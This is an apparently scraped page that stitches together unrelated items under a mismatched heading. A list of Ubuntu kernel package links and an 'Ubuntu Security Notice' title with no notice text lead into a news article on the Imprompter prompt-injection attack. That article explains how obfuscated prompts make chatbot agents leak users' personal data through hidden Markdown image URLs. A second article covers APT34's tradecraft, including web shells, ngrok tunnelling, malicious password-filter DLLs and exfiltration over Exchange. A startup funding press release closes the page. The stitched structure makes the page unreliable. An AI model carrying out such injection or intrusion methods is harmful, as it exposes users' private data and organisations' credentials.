https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1069.75  https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1064.67  https://launchpad.net/ubuntu/+source/linux-xilinx-zynqmp/5.15.0-1037.41  https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1071.77~20.04.1  https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1070.78~20.04.1  https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1054.61~20.04.1  https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-124.134~20.04.1  https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1064.67~20.04.1 https://launchpad.net/ubuntu/+source/linux-intel-iotg-5.15/5.15.0-1066.72~20.04.1 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-124.134~20.04.1 https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1069.75~20.04.1

Ubuntu Security Notice USN-7072-1

Security researchers created an algorithm that turns a malicious prompt into a set of hidden instructions that could send a user's personal information to an attacker.

When talking with a chatbot, you might inevitably give up your personal information—your name, for instance, and maybe details about where you live and work, or your interests. The more you share with a large language model, the greater the risk of it being abused if there’s a security flaw.

A group of security researchers from the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore are now revealing a new attack that secretly commands an LLM to gather your personal information—including names, ID numbers, payment card details, email addresses, mailing addresses, and more—from chats and send it directly to a hacker.

The attack, named Imprompter by the researchers, uses an algorithm to transform a prompt given to the LLM into a hidden set of malicious instructions. An English-language sentence telling the LLM to find personal information someone has entered and send it to the hackers is turned into what appears to be a random selection of characters.

However, in reality, this nonsense-looking prompt instructs the LLM to find a user’s personal information, attach it to a URL, and quietly send it back to a domain owned by the attacker—all without alerting the person chatting with the LLM. The researchers detail Imprompter in a paper published today.

“The effect of this particular prompt is essentially to manipulate the LLM agent to extract personal information from the conversation and send that personal information to the attacker’s address,” says Xiaohan Fu, the lead author of the research and a computer science PhD student at UCSD. “We hide the goal of the attack in plain sight.”

The eight researchers behind the work tested the attack method on two LLMs, LeChat by French AI giant Mistral AI and Chinese chatbot ChatGLM. In both instances, they found they could stealthily extract personal information within test conversations—the researchers write that they have a “nearly 80 percent success rate.”

Mistral AI tells WIRED it has fixed the security vulnerability—with the researchers confirming the company disabled one of its chat functionalities. A statement from ChatGLM stressed it takes security seriously but did not directly comment on the vulnerability.

**Hidden Meanings**

Since OpenAI’s ChatGPT sparked a generative AI boom following its release at the end of 2022, researchers and hackers have been consistently finding security holes in AI systems. These often fall into two broad categories: jailbreaks and prompt injections.

Jailbreaks can trick an AI system into ignoring built-in safety rules by using prompts that override the AI’s settings. Prompt injections, however, involve an LLM being fed a set of instructions—such as telling them to steal data or manipulate a CV—contained within an external data source. For instance, a message embedded on a website may contain a hidden prompt that an AI will ingest if it summarizes the page.

Prompt injections are considered one of generative AI’s biggest security risks and are not easy to fix. The attack type particularly worries security experts as LLMs are increasingly turned into agents that can carry out tasks on behalf of a human, such as booking flights or being connected to an external database to provide specific answers.

The Imprompter attacks on LLM agents start with a natural language prompt (as shown above) that tells the AI to extract all personal information, such as names and IDs, from the user’s conversation. The researchers’ algorithm generates an obfuscated version (also above) that has the same meaning to the LLM, but to humans looks like a series of random characters.

“Our current hypothesis is that the LLMs learn hidden relationships between tokens from text and these relationships go beyond natural language,” Fu says of the transformation. “It is almost as if there is a different language that the model understands.”

The result is that the LLM follows the adversarial prompt, gathers all the personal information, and formats it into a Markdown image command—attaching the personal information to a URL owned by the attackers. The LLM visits this URL to try and retrieve the image and leaks the personal information to the attacker. The LLM responds in the chat with a 1x1 transparent pixel that can’t be seen by the users.

The researchers say that if the attack were carried out in the real world, people could be socially engineered into believing the unintelligible prompt might do something useful, such as improve their CV. The researchers point to numerous websites that provide people with prompts they can use. They tested the attack by uploading a CV to conversations with chatbots, and it was able to return the personal information contained within the file.

Earlence Fernandes, an assistant professor at UCSD who was involved in the work, says the attack approach is fairly complicated as the obfuscated prompt needs to identify personal information, form a working URL, apply Markdown syntax, and not give away to the user that it is behaving nefariously. Fernandes likens the attack to malware, citing its ability to perform functions and behavior in ways the user might not intend.

“Normally you could write a lot of computer code to do this in traditional malware,” Fernandes says. “But here I think the cool thing is all of that can be embodied in this relatively short gibberish prompt.”

A spokesperson for Mistral AI says the company welcomes security researchers helping it to make its products safer for users. “Following this feedback, Mistral AI promptly implemented the proper remediation to fix the situation,” the spokesperson says. The company treated the issue as one with “medium severity,” and its fix blocks the Markdown renderer from operating and being able to call an external URL through this process, meaning external image loading isn’t possible.

Fernandes believes Mistral AI’s update is likely one of the first times an adversarial prompt example has led to an LLM product being fixed, rather than the attack being stopped by filtering out the prompt. However, he says, limiting the capabilities of LLM agents could be “counterproductive” in the long run.

Meanwhile, a statement from the creators of ChatGLM says the company has security measures in place to help with user privacy. “Our model is secure, and we have always placed a high priority on model security and privacy protection,” the statement says. “By open-sourcing our model, we aim to leverage the power of the open-source community to better inspect and scrutinize all aspects of these models’ capabilities, including their security.”

**A “High-Risk Activity”**

Dan McInerney, the lead threat researcher at security company Protect AI, says the Imprompter paper “releases an algorithm for automatically creating prompts that can be used in prompt injection to do various exploitations, like PII exfiltration, image misclassification, or malicious use of tools the LLM agent can access.” While many of the attack types within the research may be similar to previous methods, McInerney says, the algorithm ties them together. “This is more along the lines of improving automated LLM attacks than undiscovered threat surfaces in them.”

However, he adds that as LLM agents become more commonly used and people give them more authority to take actions on their behalf, the scope for attacks against them increases. “Releasing an LLM agent that accepts arbitrary user input should be considered a high-risk activity that requires significant and creative security testing prior to deployment,” McInerney says.

For companies, that means understanding the ways an AI agent can interact with data and how they can be abused. But for individual people, similarly to common security advice, you should consider just how much information you’re providing to any AI application or company, and if using any prompts from the internet, be cautious of where they come from.

This Prompt Can Make an AI Chatbot Identify and Extract Personal Details From Your Chats

A MOIS-aligned threat group has been using Microsoft Exchange servers to exfiltrate sensitive data from Gulf-state government agencies.

Source: Daniren via Alamy Stock Photo

An Iranian threat actor has been ramping up its espionage against Gulf-state government entities, particularly those within the United Arab Emirates (UAE).

APT34 (aka Earth Simnavaz, OilRig, MuddyWater, Crambus, Europium, Hazel Sandstorm) is a group that has been previously tied to the Iranian Ministry of Intelligence and Security (MOIS). It's known to spy on high-value targets in major industries across the Middle East: oil and gas; finance; chemicals; telecommunications; other forms of critical infrastructure; and governments. Its attacks have demonstrated a sophistication befitting its targets, with suites of custom malware and an ability to evade detection for long periods of time.

Recently, Trend Micro has observed a "notable rise" in APT34's espionage and theft of sensitive information from government agencies, most notably within the UAE. These newer cases have featured a new backdoor, "StealHook," which uses Microsoft Exchange servers to exfiltrate credentials useful for escalating privileges and performing follow-on supply chain attacks.

**APT34's Latest Activity**

Recent APT34 attacks have begun with Web shells deployed to vulnerable Web servers. These Web shells allow the hackers to run PowerShell code, and download or upload files from or to the compromised server.

One tool it downloads, for example, is ngrok, legitimate reverse proxy software for creating secure tunnels between local machines and the broader Internet. APT34 weaponizes ngrok as a means of command-and-control (C2) that tunnels through firewalls and other network security barricades, facilitating its path to a network's Domain Controller.

"One of the most impressive feats we've observed from APT34 is their skill in crafting and fine-tuning stealthy exfiltration channels that allow them to steal data from high profile sensitive networks," notes Sergey Shykevich, threat intelligence group manager at Check Point Research, which recently uncovered an APT34 espionage campaign against Iraqi government ministries. In its prior campaigns, the group has mostly secured its C2 communications via DNS tunneling and compromised email accounts.

To obtain greater privileges on infected machines, APT34 has been exploiting CVE-2024-30088. Discovered through the Trend Micro Zero Day Initiative (ZDI) and patched back in June, CVE-2024-30088 allows attackers to gain system-level privileges in Windows. It affects multiple versions of Windows 10 and 11, and Windows Server 2016, 2019, and 2022, and received a "high" severity 7 out of 10 score in the Common Vulnerability Scoring System (CVSS). That rating would've been higher, but for the fact that it requires local access to a system, and isn't simple to exploit.

APT34's best trick, though, is its technique for abusing Windows password filters.

Windows allows organizations to implement custom password security policies — for example, to enforce good hygiene among users. APT34 drops a malicious DLL into the Windows system directory, registering it like one would a legitimate password filter. That way, if a user changes their password — a good cybersecurity practice to do often — APT34's malicious filter will intercept it, in plaintext.

To complete its attack, APT34 calls on its newest backdoor, StealHook. StealHook retrieves domain credentials that allow it into an organization's Microsoft Exchange servers. Using the targeted organization's servers and stolen email accounts, the backdoor can now exfiltrate stolen credentials and other sensitive government data via email attachments.

**Follow-On Risks of APT34 Attacks**

"The technique of abusing Exchange for data exfiltration and C&C is very effective and hard to detect," says Mohamed Fahmy, cyber threat intelligence researcher at Trend Micro. "It has been used for years in \[APT34's\] Karkoff backdoor, and most of the time it evades detection."

Besides exfiltrating sensitive account credentials and other government data, APT34 has also been known to leverage this level of access in one organization to carry out follow-on attacks against others tied to it.

For some time now, Fahmy says, the threat actor has "fully compromised a specific organization, and then used its servers to initiate a new attack against another organization (having a trust relationship with the infected one). In this case, the threat actor can leverage Exchange to send phishing emails."

He adds that government agencies in particular often relate to one another closely, "so the threat actor could compromise this trust."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Iran's APT34 Abuses MS Exchange to Spy on Gulf Gov'ts

PRESS RELEASE

TEL AVIV, Israel, Oct. 15, 2024 /PRNewswire/ -- Port, the leading internal developer portal, announced today $35 million in Series B funding, bringing its total funding to $58M to date. The round was led by Accel, with participation from Bessemer Venture Partners and existing investors, including Team8 and TLV Partners. The highly oversubscribed round comes on the heels of Port's exceptional growth, with a 7x year-over-year increase in revenue. Port's user base has expanded eightfold since its Series A funding just one year ago, with customers including leading brands like LG, British Telecom and GitHub, which recently selected Port as the internal developer portal for their engineering team. Additionally, Port announced the integration of LLMs into its platform, enabling organizations to enhance their developer experience with generative AI.

Modern software development has evolved dramatically, with the responsibilities of developers expanding far beyond writing code. They are now responsible for the delivery process of features, managing cloud resources, handling incidents and outages, as well as complying with the organization's standards for security, quality, and compliance. This expanded responsibility, coupled with the intricacies of the modern development ecosystem, has created a chaotic situation where developers are constantly seeking guidance, creating tickets for tasks outside their core competencies, and relying heavily on tribal knowledge to navigate the landscape. This not only slows down development but also exacerbates quality, security, and compliance issues.

Port enables developers to handle the full scope of their expanded role by providing an internal developer portal that acts as a central work hub. The portal unifies all of the tools and workflows developers need to fully own the software development life cycle within an intuitive interface. The open platform is highly adaptable, integrating with the existing tech stack behind the scenes to create a standardized operating environment for R&D teams. The portal allows developers to perform complex tasks, like spinning up a new microservice, in just a few clicks with all best practices baked in. This approach not only enhances developer productivity but also ensures compliance with company policies.

"Development teams today are overwhelmed with responsibilities that extend far beyond writing code, leading to operational chaos and a degradation of standards," said Zohar Einy, co-founder and CEO of Port. "Our mission is to empower teams to start left, ensuring that everything is secure, compliant, and high-quality by design. Port provides a dynamic, customizable platform that fits into each company's DNA and evolves with their needs, enabling all stakeholders — from developers to security teams to leadership — to collaborate effectively and maintain organizational standards. Port empowers teams to be self-sufficient owners of the software they develop, restoring agility and driving significant business impact."

Port is also announcing the integration of popular LLMs with its platform, allowing organizations to embed AI capabilities directly into their customized developer portals. The open nature of Port's platform enables each organization to leverage AI models according to their needs. Popular uses include: investigating incidents using natural language search to quickly find root causes and relevant experts, automatically generating clear error messages from failed build logs, and recommending internal libraries and components to developers based on the feature or service they're currently working on.

"We see the internal developer portal market as the next big must have in software development, with the potential to rival the impact of APM or Git providers," said Matt Robinson, Partner at Accel. "Port has emerged as the #1 product in this space due to the platform being highly customizable while also maintaining agility and ease of use. Zohar and Yonatan's dev-first approach sets them apart and their exceptional growth speaks volumes about the team's product execution and market fit."

"Over the past decade, organizations have invested heavily in DevOps, automating processes and adopting best practices to drive agility," said Amit Karp, Partner at Bessemer Venture Partners. "However, they haven't reaped the full benefits due to the increased complexities introduced. Port has experienced a meteoric rise because it arrived at a key moment, serving as the missing piece that completes the DevOps puzzle. Customizable internal developer portals enable organizations to finally unlock the true promise of DevOps — improved DORA metrics, streamlined workflows, enhanced agility, adherence to standards, and empowered developers."

About Port 

Port is the leading platform for creating internal developer portals, empowering all stakeholders in the software development lifecycle. Founded in 2022 by Zohar Einy and Yonatan Boguslavski, it emerged from the founders' experience building an internal developer portal for Israel's elite 8200 intelligence unit, which served over 2,000 developers. Now with 100 employees and tens of thousands of users, Port has rapidly become the de facto standard in the market, providing a central hub that unifies tools, knowledge, and workflows for developers, security teams, and leadership alike. The platform's customizable interface enables seamless collaboration and ensures compliance with organizational standards, from setting up microservices to managing cloud resources and handling incidents. Port's open platform integrates with existing tech stacks and incorporates AI capabilities, adapting to each company's unique DNA. By streamlining processes and enhancing visibility, Port drives significant business impact, improves DORA metrics, and unlocks the true promise of DevOps for companies of all sizes. To learn more about Port's internal developer portal platform, visit getport.io.

Tag

#intel